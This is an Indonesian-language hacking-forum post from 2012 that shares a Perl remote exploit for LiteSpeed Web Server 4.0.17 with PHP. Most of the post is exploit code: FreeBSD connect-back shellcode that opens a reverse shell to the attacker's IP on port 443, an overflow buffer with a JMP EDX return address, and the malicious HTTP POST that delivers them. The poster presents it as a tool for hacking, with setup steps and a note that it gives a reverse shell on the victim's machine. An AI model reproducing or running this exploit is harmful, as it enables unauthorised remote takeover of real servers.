LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

Digital Cat · Post by **Digital Cat** » Tue Jan 10, 2012 10:43 pm

Tool lawas yang mungkin masih berguna..

wat hacking teman2x..

Copy paste di notepad and save as (.pl) / litespeed-remote.pl

and jangan lupa instal dulu perl / kalo saya menggunakan Strawberry Perl

jika binggung dimana harus download mampir ja ke situs Strawberry Perl for Windows
strawberryperl.com

berikut code :

Code: Select all

use IO::Socket;
 
$|=1;
 
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
        # setreuid, no root here
        "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
        # connect back :>
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53".
        "\xb3\x01\x53\xb3\x02\x53\x54\xb0".
        "\x61\xcd\x80\x31\xd2\x52\x52\x68".
        "\x41\x41\x41\x41\x66\x68\x01\xbb".
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10".
        "\x52\x51\x50\x52\x89\xc2\x31\xc0".
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80".
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
        "\x80\x31\xc0\x31\xdb\x43\x53\x52".
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
        "\x53\x52\x50\xb0\x5a\xcd\x80\x31".
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68".
        "\x2f\x62\x69\x6e\x89\xe3\x50\x54".
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
        "\xb0\x01\xcd\x80";
 
sub usage() {
        print "written by kingcope\n";
        print "usage:\n".
                  "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>\n\n".
                  "example:\n".
                  "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.php\n\n";
 
        exit;
}
 
if ($#ARGV ne 3) { usage; }
 
$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];
 
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
 
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
 
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                         Proto    => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";
 
#$x = <stdin>;
 
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
 
my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                  PeerPort => $port,
                                          Proto    => 'tcp');
 
 
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;
 
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";
 
while (<$sock>) {
    print;
}

apa yang bisa di maanfaain dari tool ini , kita bisa mendapatkan reverse shell ke mesin korban.